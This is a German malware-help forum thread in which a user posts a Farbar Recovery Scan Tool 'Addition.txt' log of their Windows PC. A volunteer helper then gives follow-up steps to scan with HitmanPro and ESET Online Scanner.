Microsoft .NET Framework 4.7.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02558 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Mozilla Firefox 60.0.1 (x64 de) (HKLM\...\Mozilla Firefox 60.0.1 (x64 de)) (Version: 60.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 60.0.1 - Mozilla)
MTA:SA v1.5.5 (HKLM-x32\...\MTA:SA 1.5) (Version: v1.5.5 - Multi Theft Auto)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 20.1.3 - OBS Project)
OpenOffice 4.1.5 (HKLM-x32\...\{F0C909D7-D643-4628-8C6A-94073139F0CE}) (Version: 4.15.9789 - Apache Software Foundation)
osu! (HKLM-x32\...\{5fae645a-e4b4-4541-a037-7e4aa9f3e40a}) (Version: latest - ppy Pty Ltd)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7233 - Realtek Semiconductor Corp.)
RevServicesX (HKLM\...\{DDA8E261-B96C-4D2B-887F-D8AF1D7EF361}) (Version: 4.0.4 - SystemaRev) Hidden
Spotify (HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Spotify) (Version: 1.0.80.474.gef6b503e - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.1.7 - TeamSpeak Systems GmbH)
Vulkan Run Time Libraries 1.0.65.0 (HKLM\...\VulkanRT1.0.65.0) (Version: 1.0.65.0 - LunarG, Inc.) Hidden
WinRAR 5.50 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-12-17] (Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {48AFC486-010B-4B4D-87F2-9F7C7EDA12AF} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {57F4CA92-38A7-4B47-8B28-13BE860412BD} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-05-09] (Adobe Systems Incorporated)
Task: {657B38A1-8903-4F90-8E4D-E9C7AEFDC6FC} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\dvrcmd.exe [2017-12-17] (Advanced Micro Devices, Inc.)
Task: {B51F287F-670C-42C3-A480-43546148601C} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-12-17] (Advanced Micro Devices, Inc.)
Task: {CBF07082-94D0-43DD-961D-5221CC36D495} - System32\Tasks\Microsoft\Windows\Windows Activation Technologies\ValidationTask => C:\Windows\system32\Wat\WatAdminSvc.exe [2018-02-01] ()
Task: {D74FFB45-80D0-40D0-B76B-3411A9AA73A2} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_29_0_0_171_Plugin.exe [2018-05-09] (Adobe Systems Incorporated)
Task: {E3E11419-953A-4F4A-89E6-E6FE35B1A897} - System32\Tasks\ASUS\i-Setup161131 => C:\Windows\MEI\AsusSetup.exe [2013-08-22] (ASUSTeK Computer Inc.)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
==================== Verknüpfungen & WMI ========================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2018-01-02 17:05 - 2014-01-28 05:16 - 000936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe
2017-07-25 13:25 - 2017-07-25 13:25 - 000015360 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.DLL
2017-07-25 13:25 - 2017-07-25 13:25 - 002519040 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2017-10-20 05:29 - 2017-10-20 05:29 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2017-10-20 05:29 - 2017-10-20 05:29 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2017-10-20 05:02 - 2017-10-20 05:02 - 000077824 _____ () C:\Program Files\Logitech Gaming Software\LAClient\zlib.dll
2017-10-20 05:02 - 2017-10-20 05:02 - 000144896 _____ () C:\Program Files\Logitech Gaming Software\LAClient\libssh2.dll
2018-05-31 16:22 - 2018-04-30 12:54 - 002493648 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2018-05-31 16:22 - 2018-04-25 13:16 - 002297040 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2018-01-02 17:05 - 2018-06-01 13:48 - 000033280 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\PEbiosinterface32.dll
2018-01-02 17:05 - 2014-01-28 05:16 - 000104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\ATKEX.dll
2017-12-17 22:06 - 2017-12-17 22:06 - 000357256 _____ () C:\Windows\SysWOW64\GameManager32.dll
2018-01-02 19:30 - 2018-05-01 09:32 - 000788256 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 004969248 _____ () C:\Program Files (x86)\Steam\v8.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 001563936 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 001195296 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2018-01-02 19:30 - 2018-05-19 01:01 - 002632480 _____ () C:\Program Files (x86)\Steam\video.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 005137696 _____ () C:\Program Files (x86)\Steam\libavcodec-57.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000847136 _____ () C:\Program Files (x86)\Steam\libavutil-55.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000695584 _____ () C:\Program Files (x86)\Steam\libavformat-57.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000351520 _____ () C:\Program Files (x86)\Steam\libavresample-3.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000783648 _____ () C:\Program Files (x86)\Steam\libswscale-4.dll
2018-01-02 19:30 - 2018-05-19 01:01 - 000979232 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2018-01-02 19:30 - 2016-07-05 00:17 - 000266560 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2018-01-02 19:31 - 2018-05-01 09:32 - 000788256 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 083524384 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2018-01-02 19:30 - 2015-09-25 01:52 - 000119208 _____ () C:\Program Files (x86)\Steam\winh264.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 002253600 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libglesv2.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 000109856 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libegl.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2009-07-14 04:34 - 2018-06-01 10:33 - 000000035 _____ C:\Windows\system32\Drivers\etc\hosts
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [TCP Query User{284F86A9-4949-46F6-840F-D9148097BBD8}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{85AAA64D-BA95-4ABA-953F-93C00E3E6517}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [{38372B69-909A-4837-B578-1427AF6188DE}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{BFC5EDA7-E306-4F45-9E50-132846C92DC5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{E6B568AE-25D3-4F67-8DA6-0E604EE731CB}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{045D9623-D16C-4CB2-9948-77484A2DE523}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [TCP Query User{D2EDD83C-3FCB-4D45-B08D-5FD68B2D68C2}C:\program files\amd\cnext\cnext\radeonsettings.exe] => (Block) C:\program files\amd\cnext\cnext\radeonsettings.exe
FirewallRules: [UDP Query User{0D7AD0CD-0224-44CB-A0C6-0D1EB37709E3}C:\program files\amd\cnext\cnext\radeonsettings.exe] => (Block) C:\program files\amd\cnext\cnext\radeonsettings.exe
==================== Wiederherstellungspunkte =========================
01-06-2018 00:17:39 Geplanter Prüfpunkt
==================== Fehlerhafte Geräte im Gerätemanager =============
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (06/01/2018 01:48:55 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (06/01/2018 01:37:46 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (06/01/2018 01:33:38 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (06/01/2018 10:37:17 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (05/31/2018 09:30:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: AsusSetup.exe, Version: 2.0.20.2, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000
Ausnahmecode: 0x00000000
Fehleroffset: 0x00000000
ID des fehlerhaften Prozesses: 0x7b0
Startzeit der fehlerhaften Anwendung: 0x01d3f915e0c98213
Pfad der fehlerhaften Anwendung: C:\Windows\MEI\AsusSetup.exe
Pfad des fehlerhaften Moduls: unknown
Berichtskennung: 20bf9f77-6509-11e8-bc5e-10c37b6f5940
Error: (05/31/2018 09:30:48 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (05/31/2018 04:28:49 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (05/31/2018 04:18:19 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Systemfehler:
=============
Error: (06/01/2018 01:51:00 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Intel(R) Management and Security Application Local Management Service" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.
Error: (06/01/2018 01:48:56 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen (Anwendungsspezifisch) wird der SID (S-1-5-19) für Benutzer NT-AUTORITÄT\LOKALER DIENST von Adresse LocalHost (unter Verwendung von LRPC) keine Berechtigung zum Start (Lokal) für die COM-Serveranwendung mit CLSID
{22279AF5-03AE-4CAF-989D-2530918B2F1C}
und APPID
{0773CCD6-59A2-4D26-B235-19247767E645}
gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungsprogramm für Komponentendienste geändert werden.
Error: (06/01/2018 01:48:56 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen (Anwendungsspezifisch) wird der SID (S-1-5-19) für Benutzer NT-AUTORITÄT\LOKALER DIENST von Adresse LocalHost (unter Verwendung von LRPC) keine Berechtigung zum Start (Lokal) für die COM-Serveranwendung mit CLSID
{22279AF5-03AE-4CAF-989D-2530918B2F1C}
und APPID
{0773CCD6-59A2-4D26-B235-19247767E645}
gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungsprogramm für Komponentendienste geändert werden.
Error: (06/01/2018 01:47:59 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen (Anwendungsspezifisch) wird der SID (S-1-5-19) für Benutzer NT-AUTORITÄT\LOKALER DIENST von Adresse LocalHost (unter Verwendung von LRPC) keine Berechtigung zum Start (Lokal) für die COM-Serveranwendung mit CLSID
{22279AF5-03AE-4CAF-989D-2530918B2F1C}
und APPID
{0773CCD6-59A2-4D26-B235-19247767E645}
gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungsprogramm für Komponentendienste geändert werden.
Error: (06/01/2018 01:47:59 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen (Anwendungsspezifisch) wird der SID (S-1-5-19) für Benutzer NT-AUTORITÄT\LOKALER DIENST von Adresse LocalHost (unter Verwendung von LRPC) keine Berechtigung zum Start (Lokal) für die COM-Serveranwendung mit CLSID
{22279AF5-03AE-4CAF-989D-2530918B2F1C}
und APPID
{0773CCD6-59A2-4D26-B235-19247767E645}
gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungsprogramm für Komponentendienste geändert werden.
Error: (06/01/2018 01:47:56 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Intel(R) Dynamic Application Loader Host Interface Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (06/01/2018 01:47:56 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Media Player-Netzwerkfreigabedienst" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (06/01/2018 01:47:56 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Logitech Gaming Registry Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
CodeIntegrity:
===================================
Date: 2018-06-01 13:49:13.362
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-06-01 13:38:03.847
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-06-01 13:33:43.937
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-06-01 12:35:59.910
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-06-01 10:53:34.325
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-06-01 10:37:35.824
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-06-01 09:52:51.030
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-05-31 21:31:05.188
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz
Prozentuale Nutzung des RAM: 32%
Installierter physikalischer RAM: 8132.21 MB
Verfügbarer physikalischer RAM: 5515.98 MB
Summe virtueller Speicher: 16262.6 MB
Verfügbarer virtueller Speicher: 12450.11 MB
==================== Laufwerke ================================
Drive c: () (Fixed) (Total:931.41 GB) (Free:778.8 GB) NTFS
\\?\Volume{c6be1ac3-efc6-11e7-8a05-806e6f6e6963}\ (System-reserviert) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: E8A87806)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)
==================== Ende von Addition.txt ============================
|
|
01.06.2018, 13:12
| #22 |
| | trojaner?/virus? FRST ist wie immer im anhang ^^. |
|
01.06.2018, 19:58
| #23 |
| /// TB-Ausbilder | trojaner?/virus? Servus, wir entfernen noch ein bisschen was und kontrollieren nochmal alles. Hinweis: Der Suchlauf mit ESET kann länger dauern. Schritt 1
Schritt 2 Downloade dir die passende Version von HitmanPro auf deinen Desktop: HitmanPro - 32 Bit | HitmanPro - 64 Bit.
Schritt 3 Downloade Dir bitte ESET Online Scanner (Bebilderte Anleitung)
Schritt 4
 Gibt es jetzt noch Probleme mit dem PC oder mit deinen Internet Browsern? Wenn ja, welche?Bitte poste mit deiner nächsten Antwort
|
|
04.06.2018, 21:05
| #24 |
| /// TB-Ausbilder | trojaner?/virus? Fehlende Rückmeldung Dieses Thema wurde aus den Abos gelöscht. Somit bekomme ich keine Benachrichtigung über neue Antworten. PM inklusive Link zum Thema an mich falls du denoch weiter machen willst. Hinweis: Das Verschwinden der Symptome bedeutet nicht, dass Dein Rechner schon sauber ist. Jeder andere bitte hier klicken und einen eigenen Thread erstellen! |
|
| Themen zu trojaner?/virus? |
| 100 % auslastung, cpu 100% auslastung, firefox, internet explorer, trojaner |
und 
und speichere die Logdatei auf Deinem Desktop.
Linear-Darstellung
